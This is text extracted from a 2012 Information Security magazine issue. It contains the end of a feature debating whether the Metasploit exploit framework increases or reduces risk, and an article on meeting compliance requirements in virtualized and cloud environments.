EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

43INFORMATION SECURITY n NOVEMBER 2012

THREAT MANAGEMENT

security architect at Denver-based security firm Accuvant Labs.Marcus Ranum, chief of security at Columbia, Md.-based Tenable Network

Security, says there are no easy answers when it comes to Metasploit. “To properly answer the question whether Metasploit increases or de-

creases risk would take a matter days, and I’m not sure we’d get to a conclusive answer,” he says. “If you had asked me this question a few years ago, I would have answered that Metasploit absolutely increases risk. It basically encourages weaponizing. It’s as if we are a people who are living in glass houses and it’s weaponizing stone throwers. It’s just not a good idea,” Ranum says.

“But I’ve come to realize that the relationship is more complex than that. It’s more of a co-evolutionary process,” he adds. “Tools like Metasploit do make it easier for people to exploit stuff, which then puts pressure on system owners to harden them. It may force an immune response from the community that you would not probably get otherwise.”

METASPLOIT REVIEW: PUSHING BOUNDARIESFew security tools spark such diverse opinions. And that may be why few are more famous, or infamous, than Metasploit. Developed roughly a decade ago (2003), the toolset became the open source platform for developing software security exploits. Eventually, Metasploit grew to become a large community-based open source effort. According to Moore, on a typical month there are about 65,000 unique downloads of the Metasploit installer, with more than 170,000 additional unique IP addresses updating their Metasploit software. In the past year, more than one million unique downloaders have accessed the Metasploit update server. Today, it is one of the most recognizable tools used by security professionals to exploit vulnerable systems. Metasploit also con-tains tools used to thwart computer forensic investigations and to conduct at-tacks while evading intrusion detection systems.

A decade ago software vulnerability research was much more controversial than it is today. Most major software vendors were more defensive when it came to researchers identifying flaws in their code. Many—if they didn’t try to legally squash the voice of the researcher, or deny the flaw existed—would downplay the seriousness of the flaw. For these reasons, many in the software research community argued that tools such as Metasploit were necessary to demonstrate a vulnerability was real and that it was exploitable.

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

44INFORMATION SECURITY n NOVEMBER 2012

THREAT MANAGEMENT

“Such tools were absolutely necessary for penetration testers to demon-strate that IT systems were vulnerable to attack,” says Shawn Moyer, practice manager at Accuvant Labs. “It played an important role then, and it still does today, at helping organizations to identify and reduce risk.”

At the time he created Metasploit, Moore was head of a penetration testing team, responsible for maintaining the team’s approved set of tools for customer engagements. “Exploit code in particular was hard to maintain, buggy and of-ten required major changes to adapt to a particular assessment,” he says. “The primary goal was to replace an in-house collection of exploits with a single tool that had a consistent user interface and was easier to maintain.”

Many contend that the ease of use provided by Metasploit has lowered the barriers to entry for the skills necessary to successfully conduct attacks. That’s the concept behind Joshua Corman’s theoretical, “HD Moore’s Law,” which states, “Casual attacker power grows at the rate of Metasploit.” Corman is the director of security intelligence at Akamai Technologies.

“That is exactly right. A tool like Metasploit really becomes the low bar, be-cause anybody can download it; anybody can use it. It’s reasonably functional and getting even more so,” says Mike Rothman, an analyst and president at Phoenix-based IT security research firm Securosis. “If your company’s defense can’t protect from a fairly simplistic Metasploit attack, or from any open, well proliferated tools, it’s going to be a long day in the office when you are at-tacked. In that respect, Metasploit has helped to raise the bar in terms of where defenses are for the people that care and actually use it to test their program. I also think it’s made it easier for a lot of bad people to ultimately launch suc-cessful attacks.”

METASPLOIT’S RISK IMPACTThe question remains whether, on balance, Metasploit has improved or reduced risk. “I honestly don’t think we know enough about the overlap of all of these mechanisms,” says Ranum, when considering the increased ease and availabil-ity of attack tools vs. the actions administrators take to secure and harden their systems when exploits and attacks surface.

The discussion over whether such tools increase or decrease risk harks back to the full vulnerability disclosure debate. Such arguments over the dan-gers of publicly available exploit code are not academic, as the attacks against

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

45INFORMATION SECURITY n NOVEMBER 2012

THREAT MANAGEMENT

unpatched versions of Java 7 this summer reminded everyone. This kind of at-tack activity has been going on for some time. In 2003, the SQL Slammer worm hit 75,000 systems and was based largely on a proof of concept (for which a patch was available) that exploited a buffer overflow developed and presented at the Black Hat conference by Litchfield. Today, Litchfield says the incident changed his perspective on vulnerability disclosure.

“When SQL Slammer appeared, it shook my academic bubble. I no longer viewed this work as merely an intellectual pursuit. Disclosure has real-world impact, and lives could even be at risk,” he says. “This isn’t a binary issue. It’s more octal. We need to conduct research, but have to consider the impact of our actions.”

Almost paradoxically, some see Metasploit and tools like it, as a possible de-fense against such attacks. “Once the exploit, virus or worm surfaces, the exis-tence of these attacks means the existence of Metasploit isn’t as dangerous as it could be, because we are already working to protect from these attacks. Con-versely, the existence of Metasploit also means these attacks aren’t as danger-ous. Both sides of this equation are interfering with us in a way that’s unpleas-ant, but perhaps it beats the alternative of these attacks coming out of the blue more often,” Ranum says.

A POUND OF PREVENTIONSome governments don’t view the issue objectively. A number have striven to outlaw the publication of exploits, malware and security research tools. For in-stance, the Japanese government recently passed a law that criminalized the creation and dissemination of certain types of computer malware. In 2007, Germany passed a law that outlawed computer exploits and “hacking tools.”

In the U.S., similar laws have made little headway, although attempts to con-trol security tools have surfaced. For instance, following a series of worm out-breaks, software developer Tom Liston created an application dubbed LaBrea that trapped attacking worms and hackers. He temporarily pulled the tool’s availability after an Illinois law made it illegal to create a device that was ca-pable of disrupting communication services without the authorization of the service provider. Other laws, such as the Digital Millennium Copyright Act (DMCA) of 1998 and a number of state variants have cooled security research over the years.

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

46INFORMATION SECURITY n NOVEMBER 2012

THREAT MANAGEMENT

Many believe such laws have the reverse impact of their intention to im-prove safety. “The countries that have the harshest regulations for security tools have actually seen a marked decrease in overall security awareness and innovation,” Moore argues.

Still, few would expect the call for such laws to wane any time soon. With the recent attention on cyberwar, the idea of software exploits and hacking tools as weapons of war is increasing. As such, there is a greater call for tools to be banned or regulated by international treaties. Some argue those treaties will be of little value; that hacking tools are too easy to create and hide. Late last year, members of the Shanghai Cooperation Organization, which include China, Russia, Kazakhstan, Kyrgyzstan and others proposed the International Code of Conduct for Information Security, but it was rejected by the U.S. over free speech concerns.

“Banning cyberweapons entirely is a good goal, but almost certainly un-achievable,” wrote Bruce Schneier, IT security author and chief security tech-nology officer at BT, in a U.S. News & World Report essay. “More likely are treaties that stipulate a no-first-use policy, outlaw un-aimed or broadly tar-geted weapons, and mandate weapons that self-destruct at the end of hostili-ties. Treaties that restrict tactics and limit stockpiles could be a next step. ... Yes, enforcement will be difficult. Remember how easy it was to hide a chemi-cal weapons facility? Hiding a cyberweapons facility will be even easier.”

However, such talk around restricting security research, hacking and attack tools will do little to directly protect the typical enterprise, which is also en-gaged in a smaller arms race of its own. In fact, enterprises may be much better off using tools like Metasploit to protect their own environments.

“There will always be thoughts around trying to secure infrastructure by controlling access to information and these tools,” Rothman says. “Consider the vulnerability scanners SATAN, Nmap or Nessus. Look back through infor-mation security history and there are always new tools that enabled attackers and defenders to do things better and faster. You can’t stop progress.”

As part of that progress, Metasploit is about to turn 10. Are we more secure as a result? The best answer may not be a simple yes or no, but rather: If we want to be. n

GEORGE V. HULME writes about IT security from his home in Minneapolis. Send comments on this feature to [email protected]

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

47INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

By Davi Ottenheimer

CLOUD COMPUTING

TACKLING COMPLIANCE IN THE CLOUDMoving to a cloud environment brings compliance challenges, but they’re not insurmountable.

MOST ORGANIZATIONS ALREADY have started to use virtualization technology or cloud computing. Yet some still may be reluctant to move their mission-criti-cal—tier-1—applications to these relatively new environments. While the flex-ibility and cost benefits of virtualization are widely accepted, questions linger on how to adapt to new and different risks. Security and compliance top the list of organizations’ reasons to delay adoption.

Concerns about security in a virtual environment almost always begin with a study of the relationship between guest and host. That is just the tip of the iceberg. In the end a far more comprehensive view of risk management is

48INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

necessary, which includes virtual machines (VMs), hypervisors, networking, storage and management. From configuration of software-based networking devices to software-based data centers, the process and procedures for manag-ing resources are an important part of an assessment of cloud risk and compli-ance. An assessor not only will review configuration of the VM and hypervisor technology, but also look at how logical concepts such as port groups, resource pools and clusters are being managed in relation to data flows and business logic.

Let’s take a look at some of the ways virtualization and cloud computing impact compliance and how organizations can tackle cloud compliance issues.

START WITH A STANDARD BASELINEA good strategy to manage cloud compliance is to establish a clear and trans-parent relationship with a cloud service provider. This can be facilitated by standards such as the SSAE 16 SOC 2 or ISO 27001. A framework that both parties can agree on makes it easier to get through the sections to focus on finding resolution in areas of concern. A provider that refuses to provide on-site physical assessments, for example, may not be acceptable to an assessor or a cloud customer. They might be concerned that despite what cloud providers say about identical controls in their many physical locations, which can be veri-fied on paper, the human element of managing controls can still cause controls to drift out of place and warrant on-site audits.

Perhaps the easiest way to work through cloud compliance challenges with cloud providers is to approach them first at a technical level and in terms of how compliance has been handled in the past. An operating system has typi-cally been brought into compliance by hardening it to a set of published guide-lines. Systems within government must adhere to a set of documented security standards, such as the U.S. Defense Information Systems Agency (DISA) Se-curity Technical Implementation Guide (STIG), or publications from the Na-tional Institute of Standards and Technology (NIST). Systems within a com-mercial environment may need to be measured against completely different guidelines from the Center for Internet Security (CIS) or by an industry group such as the Payment Card Industry (PCI) Security Standards Council (SSC). Like the ISO and SSAE 16 standards, although with a regulatory authority over-seeing their adoption, they can help clarify what exactly has to be done by a provider to achieve compliance.

49INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

TAKE CONTROL OF CONTINUOUS CHANGE Let’s say that a Windows 7 system on hardware could be configured to meet the CIS Benchmark version 1.2.0 released on March 30. Move that same Windows 7 system from hardware to a VM on a hypervisor managed by a provider and an assessment of compliance for that system can be seriously different. Move it into a cloud environment and it changes again. The operating system itself remains almost identical, but an updated benchmark is required to account for the relationship with the hypervisor and then the systems used to manage hy-pervisor resources. Consequently, hardening takes on new and different mean-ings based on virtualization and how it is managed. Why? The flexibility and efficiencies of cloud mean new and dif-ferent configuration options, which have different risks compared to hardware-based infrastructure.

For example, a hardware-based oper-ating system will have configuration files that define storage. Migration to a virtual machine means the configuration files that describe the hardware move outside the system and onto the hypervisor. The boundaries for a VM are defined by those configuration files. In other words, a Red Hat Enterprise Linux system would normally use a configuration file in the OS (e.g. /etc/fstab) to determine which hardware file systems to mount when it boots. The OS file has to be very particular to the equipment it was installed with (e.g. bus type, file system type, partition number). Virtualization, how-ever, will make the same file in the OS generic to reflect the typical—or at least reduced—set of options available from the hypervisor. It then moves the hard-ware details to a file read by the hypervisor but invisible to the VM’s OS.

In terms of compliance, this means there has to be a shift in how to assess technical controls when looking at a virtual environment. A hypervisor should put a VM in a sandbox, isolated from other VMs. The sandbox is defined in part by how the hypervisor controls access to its hardware. A VM therefore should have no expectation that it can achieve direct hardware access by changing its configuration file; it should only see what it is provided. At a cloud pro-vider level, this means a provider always should be validating configuration

The flexibility and efficiencies of cloud mean new and dif ferent con- figuration options, which have different risks compared to hardware- based infrastructure.

50INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

information that is uploaded with a VM before allowing that VM to run. A sim-ple failure to validate a VM setting, such as allowing a VM to directly mount hypervisor storage, could potentially compromise other VM data on that hy-pervisor. Optical drives have little or no need to be connected to a VM in a data center environment, so they usually can be disabled. Likewise, attacks on serial and parallel ports do not work if those ports are disabled.

The key to this example is that a customer will need to know whether a pro-vider validates VMs as well as disables features unused or unnecessary. It is the same concept as traditional compliance requirements—validate input and re-duce the attack surface—but applied to the new processes and control points of cloud.

While the requirements in regulations do not yet spell out this level of tech-nical detail for provisioning and de-provisioning systems, they do have language that is relevant and useful to assessors. The PCI Data Security Standard (DSS) version 2.0 states in Requirement 2.2 that a regulated entity must “develop configuration standards for all system components. Assure that these standards address all known security vulnerabilities and are consistent with industry- accepted system hardening standards.”

Cloud providers and vendors already are stepping forward to address the language of this regulatory requirement for standards. New security and com-pliance products, as well as detailed hardening guidelines, address the need for industry-accepted control requirements or recommendations. VMware’s vCenter Configuration Manager (VCM) is the type of tool that customers can request from their cloud providers to get a centralized and continual collection of configuration changes to infrastructure. A unified report will show systems that are out of sync with vendor hardening guides, or in violation of policy or regulations such as SOX, PCI DSS, HIPAA and FISMA. An emerging standard called the NIST Security Content Automation Protocol (SCAP), also supported by VCM, can even provide a detailed guide on current security configuration of operating systems and applications.

ESTABLISH TRUSTED ZONESSoftware-based networks also can be a sticking point for compliance. Segmen-tation between VMs, explained above in terms of the hypervisor, also is rele-vant to the configuration and maintenance of virtual switches. The migration

51INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

of a VM from one hypervisor to another is often done in the clear for reasons of performance and availability. In other words, the VMs are sent by providers without encryption, so anyone with access to the network would potentially intercept and view or modify data. The memory contents of a VM could be viewed or altered. Confidentiality and integrity both are at risk when this is the configuration.

To reduce the risk of these attacks, the management-related traffic of the hy-pervisor should be set to isolated and dedicated networks that are non-routable (i.e. no Layer 3 route to other networks). The port group should be on a dedi-cated VLAN. The virtual switch can be shared but the port group VLAN should never have any other VM connected. This also allows for monitoring for that VLAN ID on other port groups. Another option is to further separate the port group with a management-dedicated virtual switch and to monitor the switch for non-management traffic.

Taking this one step further, a management network should be set up at a cloud provider to restrict access only to known endpoints. Although require-ments such as PCI DSS do not explicitly state this, the PCI Security Standards Council (SSC) in 2011 made it clear with the publication of its virtualization guidelines that reducing the management interface attack surface is a best practice. An attacker is likely to target the network to gain privileged access to a cloud provider’s management interface.

That is why the management layer should be protected by giving it a dedi-cated VLAN for the management port group on a shared virtual switch. Other VM traffic may be allowable on a switch if the port group for the management VLAN is restricted only to management traffic. An additional level of security, such as stateful packet inspection and intrusion detection monitoring, will help further segment the traffic and tends to be required under some regulations such as PCI DSS. An even better step to segment management communication is to move the management VLAN to a dedicated virtual switch that does not allow for any non-management port groups. The network segment also should not be routed except to other isolated and protected management networks.

Another important step in overcoming cloud compliance challenges is re-lated to the human element; The cloud provider’s administrators and users must be trained on policy and procedures. SSL certificates not only have to be carefully managed and secured, but the administrators themselves also have to be vigilant about verifying SSL certificates before entering their passwords.

52INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

Impersonation of a VMware vCenter Server or vCloud Director with an incor-rect SSL certificate would force the client software to display a security warn-ing. An administrator might override the warning if he or she isn’t properly trained to report it and/or investigate the error as a security incident.

COMPLIANCE AS A COST-SAVEROne of the more interesting effects of cloud environments is that, when engi-neered properly, they actually can reduce compliance costs while improving security coverage. Anti-malware controls are an excellent example of how au-tomation and consolidation reduce overhead. There is no doubt that antivirus is required under practically every regulation; from SOX to PCI DSS, there is a need to prevent unauthorized code. Requirement 5 of PCI DSS v2 states sim-ply, “Use and regularly update antivirus software or programs.” Finding viruses with an ever-increasing blacklist is a resource-intensive process. Software to catch viruses tends to disappear into the underutilized capacity common on dedicated hardware. A virtual environment, by comparison, makes far more ef-ficient use of shared hardware; however, VMs can end up performing scans in competition with each other out of a limited pool of resources.

Hypervisor companies and their antivirus vendor partners are working to address this problem. For example, VMware’s vShield Endpoint offloads work from VMs to a shared and dedicated security VM on the same host. Centralized control and elimination of redundant load means a dedicated agent per VM is no longer necessary for virtual environments to achieve compliance requirements. The increased efficiency, while performing the same or better level of protection and compliance, might seem familiar to those wanting to move to the cloud.

Consider how taking this newly centralized model of compliance in the cloud can affect the storage footprint for each VM versus a traditional anti-malware agent. The traditional agent, plus several signature files for rollback capability, often is several GB in size. For the sake of argument, run a quick cal-culation for 1,000 VMs on 10 hosts with an anti-malware footprint of roughly 5 GB per host and SAN storage for the VM at $5K per TB:

(1,000 VM) x (5 GB per VM) = 5 TB 5 TB x ($5K per TB on SAN) = $25,000 in host-based antivirus storage space

53INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

CLOUD COMPUTING

Next, for comparison, run a calculation for a host running anti-malware on behalf of the VMs. The host-based anti-malware is likely to be larger than a VM anti-malware agent, so 7 GB instead of 5 GB gives the following result:

(10 Hosts) x (7 GB per host) = 70 GB.07 TB x ($5K per TB on SAN) = $350

The cost savings for cloud compliance using a host-based anti-malware model shows storage is reduced more than $24K (or $24 per VM) and saves 4 TB. Network resource benefits also are possible. The hypervisor-based solu-tion downloads malware signatures once for all the guests on a host; 10 sys-tems have to communicate updates and events instead of 1,000. Factoring in keep-alive packets, scan start/stop status and signatures for 1,000 systems is roughly 2 MB of overhead that could be eliminated from the network. A care-fully planned and controlled cloud provider environment may therefore find significant financial benefits when properly addressing the challenges of cloud compliance.

Today, organizations are eager to take advantage of the cost efficiencies of cloud computing, but they need to ensure the move won’t jeopardize their compliance efforts. Emerging standards and improved solutions from vendors are helping to guide customers and their providers to comply with many gov-ernmental and industry regulations. In some cases, it is proving easier to be compliant in the cloud than ever before. n

DAVI OTTENHEIMER is president of security consultancy flyingpenguin and author of the new book Securing the Virtual Environment: How to Defend the Enterprise Against Attack. He is a QSA and PA-QSA for K3DES with more than 17 years of experience in security operations and assessments, including a decade of leading incident response and digital forensics. Davi formerly was global com-munication security manager at Barclays Global Investors and a “Dedicated Paranoid” at Yahoo re-sponsible for digital home, broadband and mobile security. Send comments on this article to [email protected].

54INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

EDITORMarcia Savage

SENIOR MANAGING EDITORKara Gattine

SENIOR SITE EDITOREric Parizo

NEWS DIRECTORRobert Westervelt

DIRECTOR OF ONLINE DESIGNLinda Koury

COLUMNISTMarcus Ranum, Doug Jacobson, Julie A. Rursch

CONTRIBUTING EDITORSMichael Cobb, Scott Crawford,

Peter Giannoulis, Ernest N. Hayden,Jennifer Jabbusch Minella, David Jacobs,

Diana Kelley, Nick Lewis, Kevin McDonald, Sandra Kay Miller, Ed Moyle, Lisa Phifer, Ben Rothke, Anand Sastry, Dave Shackleford,

Joel Snyder, Lenny Zeltser

USER ADVISORY BOARDPhil Agcaoili, Cox Communications

Richard Bejtlich, MandiantSeth Bromberger, Energy Sector Consortium

Mike Chapple, Notre DameBrian Engle, Health and Human Services

Commission, TexasMike Hamilton, City of SeattleChris Ipsen, State of NevadaDiana Kelley, Security Curve

Nick Lewis, Saint Louis UniversityRich Mogull, SecurosisTony Spinelli, Equifax

Matthew Todd, Financial Engines

VICE PRESIDENT/GROUP PUBLISHERDoug Olender

[email protected]

ASSOCIATE PUBLISHERScott Kelly

[email protected]

TECHTARGET275 Grove Street, Newton, MA 02466

www.techtarget.com

© 2012 TechTarget Inc. No part of this publication may be transmitted or reproduced in any form or byany means without written permission from the publisher. TechTarget reprints are available

through The YGS Group.

About TechTarget: TechTarget publishes media for information technology professionals. More than 100 focused

websites enable quick access to a deep store of news, advice and analysis about the technologies, products and processes crucial to your job. Our live and virtual events give you direct access to

independent expert commentary and advice. At IT Knowledge Exchange, our social community, you can get advice and share solutions with peers and experts.

Cover and Awards feature: Getty Images/Rubberball